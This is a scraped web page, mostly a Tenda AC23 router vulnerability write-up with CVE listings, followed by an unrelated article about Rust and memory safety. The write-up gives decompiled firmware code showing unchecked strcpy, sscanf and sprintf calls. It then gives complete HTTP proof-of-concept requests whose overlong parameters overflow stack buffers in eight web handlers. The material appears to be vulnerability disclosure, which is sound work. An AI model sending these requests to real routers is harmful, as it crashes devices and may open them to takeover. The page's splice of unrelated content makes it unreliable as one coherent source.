Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the firewallEn parameter in the formSetFirewallCfg function.

**ac23**

版本信息：V16.03.07.45\_cn

**fromSetSysTime→sub\_496104→strcpy((char \*)v6, s);**

if ( !strcmp(v20, "sync") )
  {
    v19 = sub\_496104(a1);
    v14 = sub\_4C9C40(v19);
  }

int \_\_fastcall sub\_496104(int a1)
{
  int v2; // \[sp+1Ch\] \[+1Ch\]
  int v3; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v5; // \[sp+28h\] \[+28h\]
  \_\_int16 v6\[8\]; // \[sp+2Ch\] \[+2Ch\] BYREF
  \_WORD v7\[8\]; // \[sp+3Ch\] \[+3Ch\] BYREF
  int v8\[2\]; // \[sp+4Ch\] \[+4Ch\] BYREF
  int v9\[5\]; // \[sp+54h\] \[+54h\] BYREF

  v5 = 0;
  v6\[0\] = 48;
  v6\[1\] = 0;
  v6\[2\] = 0;
  v6\[3\] = 0;
  v6\[4\] = 0;
  v6\[5\] = 0;
  v6\[6\] = 0;
  v6\[7\] = 0;
  strcpy((char \*)v7, "0");
  v7\[1\] = 0;
  v7\[2\] = 0;
  v7\[3\] = 0;
  v7\[4\] = 0;
  v7\[5\] = 0;
  v7\[6\] = 0;
  v7\[7\] = 0;
  v8\[0\] = 0;
  v8\[1\] = 0;
  v9\[0\] = 0;
  v9\[1\] = 0;
  v9\[2\] = 0;
  v9\[3\] = 0;
  s = (char \*)websGetVar(a1, "timeZone", &unk\_4DDAE4);
  v3 = websGetVar(a1, "timePeriod", &unk\_4DDAE4);
  v2 = websGetVar(a1, "ntpServer", "time.windows.com");
  if ( strchr(s, ':') )
  {
    sscanf(s, "%\[^:\]:%s", v6, v7);//stack overflow
  }
  else
  {
    strcpy((char \*)v6, s);
    strcpy((char \*)v7, "0");
  }
  SetValue("sys.timesyn", "1");
  SetValue("sys.timemode", "auto");
  SetValue("sys.timezone", v6);
  SetValue("sys.timenextzone", v7);
  SetValue("sys.timefixper", v3);
  SetValue("sys.timentpserver", v2);
  if ( !CommitCfm() )
    return 1;
  GetValue("sys.timesyn", v8);
  if ( atoi((const char \*)v8) == 1 )
    sprintf((char \*)v9, "op=%d", 3);
  else
    sprintf((char \*)v9, "op=%d", 2);
  send\_msg\_to\_netctrl(24, v9);
  return v5;
}

**poc**

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 787
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.6878395284342707&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251mzhcvb
Connection: close

timeType=sync&timePeriod=86400&ntpServer=time.windows.com&timeZone=aa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&time=2000-01-01%2023%3A39%3A00

**formSetDeviceName→set\_device\_name→sprintf(v4, "%s;1", a1);**

int \_\_fastcall formSetDeviceName(int a1)
{
  int result; // $v0
  int v2; // \[sp+18h\] \[+18h\]
  const char \*v3; // \[sp+1Ch\] \[+1Ch\]
  const char \*v4; // \[sp+20h\] \[+20h\]
  int v5\[9\]; // \[sp+24h\] \[+24h\] BYREF

  v5\[0\] = 0;
  v5\[1\] = 0;
  v5\[2\] = 0;
  v5\[3\] = 0;
  v5\[4\] = 0;
  v5\[5\] = 0;
  v5\[6\] = 0;
  v5\[7\] = 0;
  v2 = 0;
  v4 = (const char \*)websGetVar(a1, "mac", &unk\_4DEB84);
  v3 = (const char \*)websGetVar(a1, "devName", &unk\_4DEB84);
  if ( set\_device\_name(v3, v4) )//stack\_overflow
  {
    sprintf((char \*)v5, "{\\"errCode\\":%d}", 1);
    result = websTransfer(a1, (const char \*)v5);
  }
  else
  {
    if ( !CommitCfm() )
      v2 = 1;
    sprintf((char \*)v5, "{\\"errCode\\":%d}", v2);
    result = websTransfer(a1, (const char \*)v5);
  }
  return result;
}

set\_device\_name

sprintf(v3, "client.devicename%s", (const char \*)v5);
sprintf(v4, "%s;1", a1);
SetValue(v3, v4);

**poc**

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.0.1
Content-Length: 264
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.9865714904007963&
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

mac=9c:fc:e8:da:9c:5b&devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**setSchedWifi→ strcpy((char \*)ptr + 2, v8)**

int \_\_fastcall setSchedWifi(int a1)
{
  int v1; // $v0
  void \*ptr; // \[sp+30h\] \[+30h\]
  int i; // \[sp+34h\] \[+34h\]
  char \*s; // \[sp+38h\] \[+38h\]
  char \*nptr; // \[sp+3Ch\] \[+3Ch\]
  const char \*v7; // \[sp+40h\] \[+40h\]
  const char \*v8; // \[sp+44h\] \[+44h\]
  char \*v9; // \[sp+48h\] \[+48h\]
  int v10; // \[sp+4Ch\] \[+4Ch\]
  int v11; // \[sp+50h\] \[+50h\]
  int v12\[2\]; // \[sp+54h\] \[+54h\] BYREF
  int v13; // \[sp+5Ch\] \[+5Ch\] BYREF
  int v14; // \[sp+60h\] \[+60h\] BYREF
  int v15; // \[sp+64h\] \[+64h\] BYREF
  int v16; // \[sp+68h\] \[+68h\] BYREF
  int v17; // \[sp+6Ch\] \[+6Ch\] BYREF
  int v18; // \[sp+70h\] \[+70h\] BYREF
  int v19; // \[sp+74h\] \[+74h\] BYREF
  char v20\[256\]; // \[sp+78h\] \[+78h\] BYREF
  char v21\[256\]; // \[sp+178h\] \[+178h\] BYREF

  v11 = 1;
  v10 = 1;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v13 = 1;
  v14 = 1;
  v15 = 1;
  v16 = 1;
  v17 = 1;
  v18 = 1;
  v19 = 1;
  i = 0;
  memset(v20, 0, sizeof(v20));
  memset(v21, 0, sizeof(v21));
  v9 = (char \*)websGetVar(a1, "schedWifiEnable", "1");
  v8 = (const char \*)websGetVar(a1, "schedStartTime", &unk\_4D7C58);
  v7 = (const char \*)websGetVar(a1, "schedEndTime", &unk\_4D7C58);
  nptr = (char \*)websGetVar(a1, "timeType", "0");
  s = (char \*)websGetVar(a1, "day", "1,1,1,1,1,1,1");
  v1 = wifi\_get\_mibname("wlan", "enable", v20);
  GetValue(v1, v12);
  if ( !LOBYTE(v12\[0\]) )
    strcpy((char \*)v12, "1");
  if ( atoi(nptr) )
    sscanf(s, "%d,%d,%d,%d,%d,%d,%d", &v13, &v14, &v15, &v16, &v17, &v18, &v19);
  SetValue("sys.sched.wifi.timeType", nptr);
  ptr = malloc(0x19u);
  v10 = atoi(v9);
  if ( ptr )
  {
    \*(\_BYTE \*)ptr = atoi((const char \*)v12) != 0;
    \*((\_BYTE \*)ptr + 1) = atoi(v9) != 0;
    strcpy((char \*)ptr + 2, v8);
    strcpy((char \*)ptr + 10, v7);
    for ( i = 0; i < 7; ++i )
      \*((\_BYTE \*)ptr + i + 18) = \*(&v13 + i) != 0;
    sub\_461D5C(ptr, 0);
    free(ptr);
    v11 = 0;
  }
  CommitCfm();
  if ( v10 )
  {
    sprintf(v21, "op=%d", 1);
    send\_msg\_to\_netctrl(62, v21);
    v11 = 0;
  }
  websWrite(
    a1,
    "HTTP/1.1 200 OK\\nContent-type: text/plain; charset=utf-8\\nPragma: no-cache\\nCache-Control: no-cache\\n\\n");
  websWrite(a1, "{\\"errCode\\":%d}", v11);
  return websDone(a1, 200);
}

**poc**

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.0.1
Content-Length: 102
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aoccvb
Connection: close

schedWifiEnable=1&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&schedEndTime=07%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

**fromSetWirelessRepeat→sub\_45CD64→sub\_45CAD8→sub\_45BB10**

if ( strcmp(v14, "none") )
  {
    if ( strcmp(v14, "wpapsk") )
      return -1;
    v13 = (char \*)websGetVar(a1, "wpapsk\_type", "wpa&wpa2");
    v12 = (char \*)websGetVar(a1, "wpapsk\_crypto", "aes");
    s = (char \*)websGetVar(a1, "wpapsk\_key", &unk\_4D72FC);
    if ( !\*s && strlen(s) < 8 )
      return -1;
    if ( !strcmp(v13, "wpa") )
    {
      strcpy(v20, "psk");
    }
    else if ( !strcmp(v13, "wpa2") )
    {
      strcpy(v20, "psk2");
    }
    else
    {
      strcpy(v20, "psk+psk2");
    }
    if ( !strcmp(v12, "tkip&aes") )
      strcpy(v21, "tkip+aes");
    else
      strcpy(v21, v12);
    v6 = wifi\_get\_mibname(a3, "extend\_wpapsk\_type", v18);
    SetValue(v6, v20);
    v7 = wifi\_get\_mibname(a3, "extend\_wpapsk\_crypto", v18);
    SetValue(v7, v21);
    v8 = wifi\_get\_mibname(a3, "extend\_wpapsk\_key", v18);
    SetValue(v8, s);
  }

**poc**

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 247
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251fsacvb
Connection: close

wifi\_chkHz=1&wl\_mode=wisp&wl\_enbale=1&country\_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk\_key=11111111&security=wpapsk&wpapsk\_type=wpa&wpapsk\_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

**fromSetWifiGusetBasic**

\_\_src = (char \*)websGetVar(param\_1,"shareSpeed",&DAT\_004d83a0);
  strcpy((char \*)&local\_124,\_\_src);

**poc**

POST /goform/WifiGuestSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 531
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251tyacvb
Connection: close

guestEn=1&guestEn\_5g=1&guestSecurity=wpapsk&guestSecurity\_5g=wpapsk&guestSsid=Tenda\_VIP&guestSsid\_5g=Tenda\_VIP\_5G&guestWrlPwd=11111111&guestWrlPwd\_5g=11111111&effectiveTime=8&shareSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**formSetQosBand**

formSetQosBand→set\_qosMib\_list→strcpy(v8, s);

int \_\_fastcall formSetQosBand(int a1)
{
int v2; // \[sp+30h\] \[+30h\]
int v3\[8\]; // \[sp+34h\] \[+34h\] BYREF
char v4\[256\]; // \[sp+54h\] \[+54h\] BYREF
int v5\[8\]; // \[sp+154h\] \[+154h\] BYREF
int v6\[8\]; // \[sp+174h\] \[+174h\] BYREF
int v7\[5\]; // \[sp+194h\] \[+194h\] BYREF

v3\[0\] = 0;
v3\[1\] = 0;
v3\[2\] = 0;
v3\[3\] = 0;
v3\[4\] = 0;
v3\[5\] = 0;
v3\[6\] = 0;
v3\[7\] = 0;
memset(v4, 0, sizeof(v4));
v2 = websGetVar(a1, "list", &unk\_4DEB84);
unSetQosOldMiblist();
set\_qosoldMib\_list();
unSetQosMiblist();
set\_qosMib\_list(v2, 10);

int \_\_fastcall set\_qosMib\_list(const char \*a1, char a2)
{
  char \*v2; // $v0
  char \*s; // \[sp+24h\] \[+24h\]
  const char \*v5; // \[sp+28h\] \[+28h\]
  int v6; // \[sp+2Ch\] \[+2Ch\]
  int v7; // \[sp+30h\] \[+30h\] BYREF
  char v8\[256\]; // \[sp+34h\] \[+34h\] BYREF
  int v9; // \[sp+134h\] \[+134h\] BYREF
  int v10; // \[sp+138h\] \[+138h\]
  int v11\[8\]; // \[sp+13Ch\] \[+13Ch\] BYREF
  int v12\[4\]; // \[sp+15Ch\] \[+15Ch\] BYREF
  int v13\[4\]; // \[sp+16Ch\] \[+16Ch\] BYREF
  char v14\[256\]; // \[sp+17Ch\] \[+17Ch\] BYREF
  int v15; // \[sp+27Ch\] \[+27Ch\]
  int v16; // \[sp+280h\] \[+280h\]
  int v17; // \[sp+284h\] \[+284h\]
  int v18; // \[sp+288h\] \[+288h\]

  v7 = 0;
  memset(v8, 0, sizeof(v8));
  v9 = 0;
  v10 = 0;
  v11\[0\] = 0;
  v11\[1\] = 0;
  v11\[2\] = 0;
  v11\[3\] = 0;
  v11\[4\] = 0;
  v11\[5\] = 0;
  v11\[6\] = 0;
  v11\[7\] = 0;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v12\[2\] = 0;
  v12\[3\] = 0;
  v13\[0\] = 0;
  v13\[1\] = 0;
  v13\[2\] = 0;
  v13\[3\] = 0;
  memset(v14, 0, sizeof(v14));
  s = (char \*)a1;
  v2 = strchr(a1, a2);
  while ( v2 )
  {
    v6 = 0;
    \*v2 = 0;
    v5 = v2 + 1;
    memset(v8, 0, sizeof(v8));
    strcpy(v8, s);
    if ( v8\[0\] == 59 )
    {
      sscanf(v8, ";%\[^;\];%\[^;\];%\[^;\];%\[^;\];", &v9, v11, v13, v12);
    }
    else
    {
      sscanf(v8, "%\[^\\r\]\\r%\[^\\r\]\\r%\[^\\r\]\\r%s", v14, v11, v13, v12);
      v6 = 1;
    }
    if ( atoi((const char \*)v13) || atoi((const char \*)v12) )
    {
      if ( v6 == 1 )
        set\_device\_name(v14, v11);

这个参数长度不加以限制还会影响set\_device\_name

**poc**

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.0.1
Content-Length: 791
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/net\_control.html?random=0.0444079600832199&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aticvb
Connection: close

list=DESKTOP-V29RD1268aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:77:24:54:a9:c000
Unknownaaaaaaaaaaaaaaaaaaaaaaaaaaaaunknown00

**setSmartPowerManagement**

    nptr = (char \*)websGetVar(a1, "powerSavingEn", "0");
  s = (char \*)websGetVar(a1, "time", "00:00-7:30");
  v4 = websGetVar(a1, "powerSaveDelay", "1");
  v3 = (char \*)websGetVar(a1, "ledCloseType", "allClose");
  if ( nptr && s && v4 && v3 )
  {
    sscanf(s, "%\[^:\]:%\[^-\]-%\[^:\]:%s", v7, v8, v9, v10);
    sprintf(v11, "%s:%s", (const char \*)v7, (const char \*)v8);
    sprintf(v12, "%s:%s", (const char \*)v9, (const char \*)v10);
    GetValue("sys.sched.led.closetype", v13);

**poc**

POST /goform/PowerSaveSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 803
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/sleep\_mode.html?random=0.7222154127483253&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251csvcvb
Connection: close

powerSavingEn=1&time=0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0%3A00-07%3A00&ledCloseType=allClose&powerSaveDelay=1

**formSetFirewallCfg**

int \_\_fastcall formSetFirewallCfg(int a1)
{
  int v1; // $a1
  int v2; // $a2
  \_BOOL4 v4; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v6\[2\]; // \[sp+28h\] \[+28h\] BYREF
  char v7\[64\]; // \[sp+30h\] \[+30h\] BYREF
  int v8\[2\]; // \[sp+70h\] \[+70h\] BYREF
  char v9\[64\]; // \[sp+78h\] \[+78h\] BYREF

  v6\[0\] = 0;
  v6\[1\] = 0;
  memset(v7, 0, sizeof(v7));
  v8\[0\] = 0;
  v8\[1\] = 0;
  memset(v9, 0, sizeof(v9));
  s = (char \*)websGetVar(a1, "firewallEn", "1111");
  if ( strlen(s) \>\= 4 )
  {
    strcpy((char \*)v6, s);

**poc**

POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 764
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/firewall.html?random=0.3855955678045606&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251izccvb
Connection: close

firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-43108: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the time parameter in the setSmartPowerManagement function.

CVE-2022-43107: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the schedStartTime parameter in the setSchedWifi function.

CVE-2022-43106: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the shareSpeed parameter in the fromSetWifiGusetBasic function.

CVE-2022-43105: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

CVE-2022-43104: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the list parameter in the formSetQosBand function.

CVE-2022-43103: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the devName parameter in the formSetDeviceName function.

CVE-2022-43101: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the timeZone parameter in the fromSetSysTime function.

CVE-2022-43102: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Rust makes it impossible to introduce some of the most common security vulnerabilities. And its adoption can’t come soon enough.

Whether you run IT for a massive organization or simply own a smartphone, you're intimately familiar with the unending stream of software updates that constantly need to be installed because of bugs and security vulnerabilities. People make mistakes, so code is inevitably going to contain mistakes—you get it. But a growing movement to write software in a language called Rust is gaining momentum because the code is goof-proof in an important way. By design, developers can't accidentally create the most common types of exploitable security vulnerabilities when they're coding in Rust, a distinction that could make a huge difference in the daily patch parade and ultimately the world's baseline cybersecurity.

There are fads in programming languages, and new ones come and go, often without lasting impact. Now 12 years old, Rust took time to mature from the side project of a Mozilla researcher into a robust ecosystem. Meanwhile, the predecessor language C, which is still widely used today, turned 50 this year. But because Rust produces more secure code and, crucially, doesn't worsen performance to do it, the language has been steadily gaining adherents and now is at a turning point. Microsoft, Google, and Amazon Web Services have all been utilizing Rust since 2019, and the three companies formed the nonprofit Rust Foundation with Mozilla and Huawei in 2020 to sustain and grow the language. And after a couple of years of intensive work, the Linux kernel took its first steps last month to implement Rust support.

“It’s going viral as a language,” says Dave Kleidermacher, vice president of engineering for Android security and privacy. “We’ve been investing in Rust on Android and across Google, and so many engineers are like, ‘How do I start doing this? This is great.’ And Rust just landed for the first time as an officially recognized and accepted language in Linux. So this is not just Android; any system based on Linux now can start to incorporate Rust components.”

Rust is what's known as a “memory-safe” language because it's designed to make it impossible for a program to pull unintended data from a computer's memory accidentally. When programmers use stalwart languages that don't have this property, including C and C++, they have to carefully check the parameters of what data their program is going to be requesting and how—a task that even the most skilled and experienced developers will occasionally botch. By writing new software in Rust instead, even amateur programmers can be confident that they haven't introduced any memory-safety bugs into their code.

A program's memory is a shared resource used by all of its features and libraries. Imagine a calendar program written in a language that isn't memory-safe. You open your calendar and then request entries for November 2, 2022, and the program fetches all information from the area of your computer's memory assigned to store that date’s data. All good. But if the program isn't designed with the right constraints, and you request entries for November 42, 2022, the software, instead of producing an error or other failure, may dutifully return information from a part of the memory that's housing different data—maybe the password you use to protect your calendar or the credit card number you keep on file for premium calendar features. And if you add a birthday party to your calendar on November 42, it may overwrite unrelated data in memory instead of telling you that it can't complete the task. These are known as “out-of-bounds” read and write bugs, and you can see how they could potentially be exploited to give an attacker improper access to data or even expanded system control.

Another common type of memory-safety bug, known as “use-after-free,” involves a situation where a program has given up its claim to a portion of memory (maybe you deleted all your calendar entries for October 2022) but mistakenly retains access. If you later request data from October 17, the program may be able to grab whatever data has ended up there. And the existence of memory-safety vulnerabilities in code also introduces the possibility that a hacker could craft, say, a malicious calendar invitation with a strategically chosen date or set of event details designed to manipulate the memory to grant the attacker remote access.

These types of vulnerabilities aren't just esoteric software bugs. Research and auditing have repeatedly found that they make up the majority of all software vulnerabilities. So while you can still make mistakes and create security flaws while programming in Rust, the opportunity to eliminate memory-safety vulnerabilities is significant.

“Memory-safety issues are responsible for a huge, huge percentage of all reported vulnerabilities, and this is in critical applications like operating systems, mobile phones, and infrastructure,” says Dan Lorenc, CEO of the software supply-chain security company Chainguard. “Over the decades that people have been writing code in memory-unsafe languages, we’ve tried to improve and build better tooling and teach people how to not make these mistakes, but there are just limits to how much telling people to try harder can actually work. So you need a new technology that just makes that entire class of vulnerabilities impossible, and that’s what Rust is finally bringing to the table.”

